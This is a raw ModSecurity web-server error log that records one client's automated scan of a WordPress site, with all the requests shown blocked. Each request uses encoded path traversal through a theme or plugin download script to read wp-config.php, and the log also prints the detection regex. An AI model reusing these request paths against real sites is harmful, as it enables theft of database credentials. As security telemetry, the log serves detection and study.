"Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "Y8DxFqGMrWzzUVMdEhcL3gAAANM"] [Fri Jan 13 00:50:14.480795 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:42942] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "Y8DxFqGMrWzzUVMdEhcL3wAAAMs"] [Fri Jan 13 00:50:14.596184 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:42944] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lote27/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lote27/download.php"] [unique_id "Y8DxFqGMrWzzUVMdEhcL4AAAANA"] [Fri Jan 13 00:50:14.716336 2023] [:error] [pid 31476:tid 140315388712704] [client 185.206.224.212:42946] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "Y8DxFqGMrWzzUVMdEhcL4QAAAMI"] [Fri Jan 13 00:50:14.831428 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:42948] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/medicate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/medicate/download.php"] [unique_id "Y8DxFqGMrWzzUVMdEhcL4gAAAME"] [Fri Jan 13 00:50:14.962375 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:42950] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cuckootap/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cuckootap/download.php"] [unique_id "Y8DxFqGMrWzzUVMdEhcL4wAAAM4"] [Fri Jan 13 00:50:15.077589 2023] [:error] [pid 31476:tid 140315138635520] [client 185.206.224.212:42952] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IncredibleWP/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IncredibleWP/download.php"] [unique_id "Y8DxF6GMrWzzUVMdEhcL5AAAANc"] [Fri Jan 13 00:50:15.196276 2023] [:error] [pid 31043:tid 140315405498112] [client 185.206.224.212:42954] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ultimatum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ultimatum/download.php"] [unique_id "Y8DxF8x9A9c0KkSpLadQEwAAAIA"] [Fri Jan 13 00:50:15.312691 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:42958] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Centum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Centum/download.php"] [unique_id "Y8DxF6GMrWzzUVMdEhcL5QAAAMw"] [Fri Jan 13 00:50:15.427762 2023] [:error] [pid 31041:tid 140315230955264] [client 185.206.224.212:42960] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Avada/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Avada/download.php"] [unique_id "Y8DxF8PRCDYHCWWhHpAjsQAAAAw"] [Fri Jan 13 00:50:15.543280 2023] [:error] [pid 31042:tid 140315188991744] [client 185.206.224.212:42962] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/striking_r/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/striking_r/download.php"] [unique_id "Y8DxF46vAq65Ygpdg5ObPQAAAFE"] [Fri Jan 13 00:50:15.657962 2023] [:error] [pid 31042:tid 140315397105408] [client 185.206.224.212:42964] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/beach_apollo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/beach_apollo/download.php"] [unique_id "Y8DxF46vAq65Ygpdg5ObPgAAAEE"] [Fri Jan 13 00:50:15.789974 2023] [:error] [pid 31476:tid 140315180599040] [client 185.206.224.212:42966] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php"] [unique_id "Y8DxF6GMrWzzUVMdEhcL5gAAANI"] [Fri Jan 13 00:50:15.905378 2023] [:error] [pid 31043:tid 140315130242816] [client 185.206.224.212:42968] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/newspro2891/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/newspro2891/download.php"] [unique_id "Y8DxF8x9A9c0KkSpLadQFQAAAJg"] [Fri Jan 13 00:50:16.045352 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:42970] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/draisabeladavid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/draisabeladavid/download.php"] [unique_id "Y8DxGKGMrWzzUVMdEhcL5wAAANQ"] [Fri Jan 13 00:50:16.168558 2023] [:error] [pid 31041:tid 140315172206336] [client 185.206.224.212:42972] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hfr/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hfr/download.php"] [unique_id "Y8DxGMPRCDYHCWWhHpAjsgAAABM"] [Fri Jan 13 00:50:16.283870 2023] [:error] [pid 31042:tid 140315205777152] [client 185.206.224.212:42974] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/storepress/framework/utilities/download/getfile.php"] [unique_id "Y8DxGI6vAq65Ygpdg5ObPwAAAE8"] [Fri Jan 13 00:50:16.401314 2023] [:error] [pid 31041:tid 140315155420928] [client 185.206.224.212:42976] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "Y8DxGMPRCDYHCWWhHpAjswAAABU"] [Fri Jan 13 00:50:16.519698 2023] [:error] [pid 31476:tid 140315289704192] [client 185.206.224.212:42978] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yaml-green/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yaml-green/download.php"] [unique_id "Y8DxGKGMrWzzUVMdEhcL6AAAAMU"] [Fri Jan 13 00:50:16.636274 2023] [:error] [pid 31476:tid 140315130242816] [client 185.206.224.212:42980] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/itchyrobot_parent/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/itchyrobot_parent/download.php"] [unique_id "Y8DxGKGMrWzzUVMdEhcL6QAAANg"] [Fri Jan 13 00:50:16.751644 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:42982] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mh-magazine-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mh-magazine-lite/down.php"] [unique_id "Y8DxGKGMrWzzUVMdEhcL6gAAANU"] [Fri Jan 13 00:50:16.866382 2023] [:error] [pid 31476:tid 140315188991744] [client 185.206.224.212:42984] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/seacad/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/seacad/inc/download.php"] [unique_id "Y8DxGKGMrWzzUVMdEhcL6wAAANE"] [Fri Jan 13 00:50:17.000970 2023] [:error] [pid 31476:tid 140315264526080] [client 185.206.224.212:42986] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/theme-wpaitaliadigitale-full/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/theme-wpaitaliadigitale-full/down.php"] [unique_id "Y8DxGKGMrWzzUVMdEhcL7AAAAMg"] [Fri Jan 13 00:50:17.127557 2023] [:error] [pid 31042:tid 140315172206336] [client 185.206.224.212:42988] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match 